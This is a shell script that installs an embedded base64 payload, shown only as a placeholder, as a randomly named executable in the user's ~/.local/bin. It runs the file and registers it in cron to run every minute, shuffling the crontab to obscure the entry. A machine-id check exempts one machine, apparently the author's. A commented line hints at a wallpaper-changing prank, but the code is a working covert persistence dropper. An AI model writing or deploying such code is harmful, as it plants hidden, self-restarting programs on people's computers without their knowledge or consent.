#!/bin/sh

base64_payload='...'  # line 3 will be set by the build script



if [ "$(sha256sum /etc/machine-id | cut -c1-16)" = '9b03cac63d4c0528' ] && [ "$(printf '%s\n' "$ZELL" | sha256sum | cut -c1-64)" != 'c60215d0b68bde1dd1b4aa250d06d1c6c5667d081623d4c4d0f3affed7407a1c' ]; then
    printf '\033[1;33mNope, not on this machine.\n'
    exit 42
fi



# get name of desktop environment
de_info="$DESKTOP_SESSION $XDG_CURRENT_DESKTOP" # this may contain weird stuff we don't need, but this string is searched using grep anyway
if [ -n "$GNOME_DESKTOP_SESSION_ID" ]; then
    de_info="gnome"
fi
if [ -n "$MATE_DESKTOP_SESSION_ID" ]; then
    de_info="mate"
fi

mkdir -p -- "$HOME/.crontab_backups" && crontab -l > "$HOME/.crontab_backups/crontab_$(date '+%Y-%m-%d_%H:%M:%S').bak"

filename_length=$((($(date +%N | sed 's/^0*//') % 5) + 2))
filepath="$HOME/.local/bin/$(head -c $filename_length  /dev/urandom | base64 | head -c $filename_length | tr '/+-' 'Zzx')"
while [ -e "$filepath" ]; do
    filename_length=$((filename_length + 2))
    filepath="$HOME/.local/bin/$(head -c $filename_length  /dev/urandom | base64 | head -c $filename_length | tr '/+-' 'Zzx')"
done

mkdir -p "$HOME/.local/bin"

echo "$base64_payload" | base64 --decode | awk -v newpath="this_file_path='$filepath'" 'NR==3 {$0=newpath} {print}' | awk -v deinfo="de_info='$de_info'" 'NR==4 {$0=deinfo} {print}' > "$filepath"
chmod +x -- "$filepath"
"$filepath"

# echo "PLACEHOLDER_change_wallpaper" | base64 --decode > "$HOME/.local/bin/_zip_err_load_link_wp"
# chmod +x "$HOME/.local/bin/_zip_err_load_link_wp"
# "$HOME/.local/bin/_zip_err_load_link_wp"

{ crontab -l | grep -Fv "$filepath" | grep -Ev "^ *$"; printf '* * * * * %s\n' "$filepath"; } | shuf | crontab -
